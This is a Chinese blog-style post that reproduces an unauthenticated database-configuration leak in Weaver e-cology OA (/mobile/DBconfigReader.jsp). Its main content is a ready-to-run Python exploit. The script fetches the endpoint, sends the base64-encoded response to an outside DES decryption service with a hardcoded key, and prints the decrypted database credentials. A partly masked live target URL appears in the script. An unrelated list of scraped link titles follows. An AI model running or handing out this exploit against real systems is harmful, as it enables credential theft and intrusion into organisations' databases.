泛微mysql密码_泛微ecology OA数据库配置信息泄露
漏洞详情#
泛微e-cology OA系统/mobile/DBconfigReader.jsp存在未授权访问,通过解密,可直接获取数据库配置信息。
利用前提
/mobile/DBconfigReader.jsp存在未授权访问。
漏洞复现#
利用github的exp报错,解密踩坑如下:
乱码,需要用b64加密后用密钥解密
\r\n,详见参考链接
最终python脚本如下:
import base64
import requests
import ast
def req(url):
headers = {
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
r1 = requests.get(url,headers=headers).content
s = r1.replace('\r\n','')
res1 = base64.b64encode(s)
postdata = {
'data':res1,
'type':'des',
'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
}
u = 'http://tool.chacuo.net/cryptdes'
r2 = requests.post(u,data=postdata,headers=headers).content
res2 = ast.literal_eval(r2)
return res2['data']
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'
print req(url)
泛微mysql密码_泛微ecology OA数据库配置信息泄露相关推荐
- 浅谈【漏洞复现】泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
目前 0x00 前言 0x01 漏洞简诉 0x02 漏洞分析 0x03 漏洞剖析 0x04 漏洞复现 0x05 复现那些泪水 0x06 复现总结 0x07 免责声明 0x00 前言 漏洞被曝光有几天时 ...
- powershell查看mysql密码_使用Windows PowerShell从数据库导入用户
使用Windows PowerShell从数据库导入用户 虽然在70-640考试中并不涉及使用Windows PowerShell导入数据库的方法,不过学习这样的做法可为以后自动创建用户的工作产生巨大 ...
- win7 mysql 密码_笔记本win7系统下mysql忘记密码的最佳解决方法
MySQL是一个关系型数据库管理系统,在笔记本win7系统下编程的时候就需要用到MySQL数据库,不过有时候一段时间没用的话,可能会忘记数据库的登录密码了,当忘记密码就无法进入mysql,要如何解决呢 ...
- Linux重置Mysql密码_解决MySQL for Linux错误 ERROR 1045 (28000): Access denied for user ‘root‘@‘localhost
Linux重置Mysql密码 一般这个错误是由密码错误引起,解决的办法自然就是重置密码. 假设我们使用的是root账户. 1.重置密码的第一步就是跳过MySQL的密码认证过程,方法如下: #vim / ...
- phpnow mysql密码_使用PHPnow搭建本地PHP环境+创建MySQL数据库
要想学习WordPress建站,在本地搭建PHP环境是十分必要的,在以后的建站日子里,你可以使用这个环境来进行wordpress的程序学习.调试等工作,等你熟悉了wordpress以后,再购买域名和空 ...
- 忘记本地mysql密码_本地MySQL密码忘了,怎么找回?
展开全部 MySQL密码通常保存在mysql数据库中,我们可以在访问数据之后,使用如下指令进32313133353236313431303231363533e58685e5aeb93133336564 ...
- update语句修改mysql密码_修改 mysql 密码
修改mysql密码的方法 use mysql update user set Password=password('newpassword') where User='root'; flush pri ...
- heidisql修改mysql密码_读取HeidiSQL 配置文件中的密码
读取HeidiSQL 配置文件中的密码 2017-1-21 5:42:01 codegay HeidiSQL是一款开源的SQL管理工具,用管理MYSQL,MSSQL 等数据库, 很多管理工具都会把密码 ...
- heidisql修改mysql密码_获取HeidiSQL保存的密码
Loading... 请注意,本文编写于 273 天前,最后修改于 273 天前,其中某些信息可能已经过时. 今天在使用一个数据库时一是半会想不起来数据库的密码了,后来想起来在客户端工具heidisq ...
- 网站管理助手4.0教程mysql密码_网站管理助手v4.0 建站流程
点击"创建站点",如图: 站点名称:填写一个FTP账号,可以是英文(建议小写)和数字的组合 FTP密码:建议保持默认或自己设定一个容易记住但比较复杂的密码,切勿用FTP账号做密码. ...
最新文章
- 解题报告:POJ - 1062 昂贵的聘礼(最短路、超级源点)
- 两台主机ssh的测试及配置
- Spring MVC快速教程:依赖注入 Spring MVC Fast Tutorial: Dependency Injection
- 数据库操作技术--Spring jdbcTemplate
- 牛客多校4 - Basic Gcd Problem(预处理质因子的个数)
- 以JSONobject形式提交http请求
- 函数式编程语言:LISP/Scheme 小语种简介
- ASP.NET中的事件处理
- HDU2032 杨辉三角【入门】
- OK335xS psplash Screen 移植
- 内网DNS重要使用作用
- js 判断是不是数组
- vscode快捷键实现快速换行
- 无线蓝牙手表FCC ID认证测试项目有哪些?
- random模块——随机数常用函数介绍
- allegro如何快速的按照模板放置器件
- 上海社保查询 最强攻略
- html个人简历制作
- 原始设备制造商OEM简介
- 如果你的口才不好就请坚持写日记